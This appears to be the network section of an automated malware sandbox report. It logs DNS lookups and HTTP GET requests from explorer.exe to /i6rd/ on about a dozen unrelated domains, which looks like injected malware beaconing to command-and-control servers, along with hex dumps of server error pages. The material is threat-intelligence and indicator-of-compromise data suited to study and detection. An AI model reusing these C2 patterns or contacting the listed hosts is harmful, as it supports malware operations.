                                                                  May 12, 2021 15:48:19.092062950 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092201948 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092216969 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.092283010 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.092397928 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:24.203677893 CEST4976880192.168.2.4185.53.177.53

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 12, 2021 15:46:36.814066887 CEST5453153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:36.864743948 CEST53545318.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:37.713713884 CEST4971453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:37.762743950 CEST53497148.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:38.796724081 CEST5802853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:38.845554113 CEST53580288.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:39.592092037 CEST5309753192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:39.652911901 CEST53530978.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:42.303510904 CEST4925753192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:42.355633020 CEST53492578.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:43.388578892 CEST6238953192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:43.440186977 CEST53623898.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:45.350935936 CEST4991053192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:45.402674913 CEST53499108.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:46.534737110 CEST5585453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:46.586438894 CEST53558548.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:47.748987913 CEST6454953192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:47.801074982 CEST53645498.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:49.071911097 CEST6315353192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:49.120729923 CEST53631538.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:50.282104015 CEST5299153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:50.331032991 CEST53529918.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:51.485450029 CEST5370053192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:51.544975042 CEST53537008.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:52.761302948 CEST5172653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:52.810089111 CEST53517268.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:53.900584936 CEST5679453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:53.949546099 CEST53567948.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:54.826957941 CEST5653453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:54.880492926 CEST53565348.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:55.795959949 CEST5662753192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:55.844654083 CEST53566278.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:56.894179106 CEST5662153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:56.944658041 CEST53566218.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:58.453923941 CEST6311653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:58.505796909 CEST53631168.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:00.779433966 CEST6407853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:00.829524994 CEST53640788.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:09.577151060 CEST6480153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:09.645700932 CEST53648018.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:20.309665918 CEST6172153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:20.362169981 CEST53617218.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:31.677963972 CEST5125553192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:31.743438959 CEST53512558.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:45.299787045 CEST6152253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:45.413086891 CEST53615228.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:46.130975962 CEST5233753192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:46.191771030 CEST53523378.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:46.821439981 CEST5504653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:47.108288050 CEST53550468.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:47.545085907 CEST4961253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:47.602678061 CEST53496128.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:48.207484961 CEST4928553192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:48.265036106 CEST53492858.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:48.434736967 CEST5060153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:48.502091885 CEST53506018.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:49.084553003 CEST6087553192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:49.147979021 CEST53608758.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:49.649899960 CEST5644853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:49.715104103 CEST53564488.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:49.715118885 CEST5917253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:49.763880014 CEST53591728.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:50.554244041 CEST6242053192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:50.611854076 CEST53624208.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:51.538911104 CEST6057953192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:51.600545883 CEST53605798.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:52.124300957 CEST5018353192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:52.176544905 CEST53501838.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:52.782249928 CEST6153153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:52.844850063 CEST53615318.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:54.907033920 CEST4922853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:55.083226919 CEST53492288.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:01.799061060 CEST5979453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:01.870407104 CEST53597948.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:07.185003042 CEST5591653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:07.567153931 CEST53559168.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:13.299730062 CEST5275253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:13.560631990 CEST53527528.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:18.851711988 CEST6054253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:18.925479889 CEST53605428.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:22.347239017 CEST6068953192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:22.414751053 CEST53606898.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:24.136452913 CEST6420653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:24.190939903 CEST5090453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:24.202259064 CEST53642068.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:24.262418032 CEST53509048.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:29.346699953 CEST5752553192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:29.420010090 CEST53575258.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:34.661406040 CEST5381453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:34.835792065 CEST53538148.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:40.305569887 CEST5341853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:40.366614103 CEST53534188.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:45.458513021 CEST6283353192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:45.522173882 CEST53628338.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:55.627368927 CEST5926053192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:55.690572977 CEST53592608.8.8.8192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  May 12, 2021 15:47:49.649899960 CEST192.168.2.48.8.8.80xf9d0Standard query (0)www.thebenefitssherpa.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:47:54.907033920 CEST192.168.2.48.8.8.80x5743Standard query (0)www.onlinecasinocrazy.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.799061060 CEST192.168.2.48.8.8.80x9a46Standard query (0)www.blissfulbeeboutique.onlineA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:07.185003042 CEST192.168.2.48.8.8.80xd198Standard query (0)www.cityofhouston.infoA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:13.299730062 CEST192.168.2.48.8.8.80xaea8Standard query (0)www.socialeconomic.netA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:18.851711988 CEST192.168.2.48.8.8.80x726bStandard query (0)www.toypoodlebreedershome.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:24.136452913 CEST192.168.2.48.8.8.80x30ceStandard query (0)www.ricdevan.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:29.346699953 CEST192.168.2.48.8.8.80xf6e2Standard query (0)www.ximibabes.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:34.661406040 CEST192.168.2.48.8.8.80xcfb4Standard query (0)www.sabaidiving.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:40.305569887 CEST192.168.2.48.8.8.80xb2a5Standard query (0)www.onemoresysadmin.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:45.458513021 CEST192.168.2.48.8.8.80x4cc3Standard query (0)www.countrywideeconomy.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:55.627368927 CEST192.168.2.48.8.8.80xfd6Standard query (0)www.woo.educationA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  May 12, 2021 15:47:49.715104103 CEST8.8.8.8192.168.2.40xf9d0No error (0)www.thebenefitssherpa.comthebenefitssherpa.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:47:49.715104103 CEST8.8.8.8192.168.2.40xf9d0No error (0)thebenefitssherpa.com34.102.136.180A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:47:55.083226919 CEST8.8.8.8192.168.2.40x5743No error (0)www.onlinecasinocrazy.comonlinecasinocrazy.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:47:55.083226919 CEST8.8.8.8192.168.2.40x5743No error (0)onlinecasinocrazy.com119.81.45.82A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)www.blissfulbeeboutique.onlineext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:07.567153931 CEST8.8.8.8192.168.2.40xd198No error (0)www.cityofhouston.infocityofhouston.infoCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:07.567153931 CEST8.8.8.8192.168.2.40xd198No error (0)cityofhouston.info103.15.186.68A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:13.560631990 CEST8.8.8.8192.168.2.40xaea8No error (0)www.socialeconomic.netsocialeconomic.netCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:13.560631990 CEST8.8.8.8192.168.2.40xaea8No error (0)socialeconomic.net51.222.80.112A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:18.925479889 CEST8.8.8.8192.168.2.40x726bNo error (0)www.toypoodlebreedershome.comtoypoodlebreedershome.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:18.925479889 CEST8.8.8.8192.168.2.40x726bNo error (0)toypoodlebreedershome.com81.88.52.88A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:24.202259064 CEST8.8.8.8192.168.2.40x30ceNo error (0)www.ricdevan.com185.53.177.53A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:29.420010090 CEST8.8.8.8192.168.2.40xf6e2No error (0)www.ximibabes.comximyumi.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:29.420010090 CEST8.8.8.8192.168.2.40xf6e2No error (0)ximyumi.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:29.420010090 CEST8.8.8.8192.168.2.40xf6e2No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:34.835792065 CEST8.8.8.8192.168.2.40xcfb4No error (0)www.sabaidiving.com192.64.147.164A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:40.366614103 CEST8.8.8.8192.168.2.40xb2a5No error (0)www.onemoresysadmin.comonemoresysadmin.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:40.366614103 CEST8.8.8.8192.168.2.40xb2a5No error (0)onemoresysadmin.com192.0.78.24A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:40.366614103 CEST8.8.8.8192.168.2.40xb2a5No error (0)onemoresysadmin.com192.0.78.25A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:45.522173882 CEST8.8.8.8192.168.2.40x4cc3No error (0)www.countrywideeconomy.com52.58.78.16A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:55.690572977 CEST8.8.8.8192.168.2.40xfd6Name error (3)www.woo.educationnonenoneA (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.thebenefitssherpa.com
                                                                  • www.onlinecasinocrazy.com
                                                                  • www.blissfulbeeboutique.online
                                                                  • www.cityofhouston.info
                                                                  • www.socialeconomic.net
                                                                  • www.toypoodlebreedershome.com
                                                                  • www.ricdevan.com
                                                                  • www.ximibabes.com
                                                                  • www.sabaidiving.com
                                                                  • www.onemoresysadmin.com
                                                                  • www.countrywideeconomy.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.44975234.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:47:49.762125969 CEST1675OUTGET /i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.thebenefitssherpa.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:47:49.899209023 CEST1684INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Wed, 12 May 2021 13:47:49 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60995c26-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.449762119.81.45.8280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:47:55.530891895 CEST5420OUTGET /i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.onlinecasinocrazy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  10192.168.2.44977352.58.78.1680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:45.566056013 CEST6199OUTGET /i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.countrywideeconomy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:45.607007027 CEST6200INHTTP/1.1 410 Gone
                                                                  Server: openresty
                                                                  Date: Wed, 12 May 2021 13:47:39 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 36 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 75 6e 74 72 79 77 69 64 65 65 63 6f 6e 6f 6d 79 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 32 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 75 6e 74 72 79 77 69 64 65 65 63 6f 6e 6f 6d 79 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7<html>9 <head>56 <meta http-equiv='refresh' content='5; url=http://www.countrywideeconomy.com/' />a </head>9 <body>42 You are being redirected to http://www.countrywideeconomy.coma </body>8</html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.449763198.185.159.14480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:02.005036116 CEST6102OUTGET /i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.blissfulbeeboutique.online
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:02.140299082 CEST6103INHTTP/1.1 400 Bad Request
                                                                  Cache-Control: no-cache, must-revalidate
                                                                  Content-Length: 77564
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Date: Wed, 12 May 2021 13:48:02 UTC
                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                  Pragma: no-cache
                                                                  Server: Squarespace
                                                                  X-Contextid: gCs6earh/9UltTqOd
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                  Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.449764103.15.186.6880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:07.924396992 CEST6139OUTGET /i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.cityofhouston.info
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:08.279015064 CEST6139INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.14.0
                                                                  Date: Wed, 12 May 2021 13:48:08 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Content-Length: 387
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 69 74 79 6f 66 68 6f 75 73 74 6f 6e 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 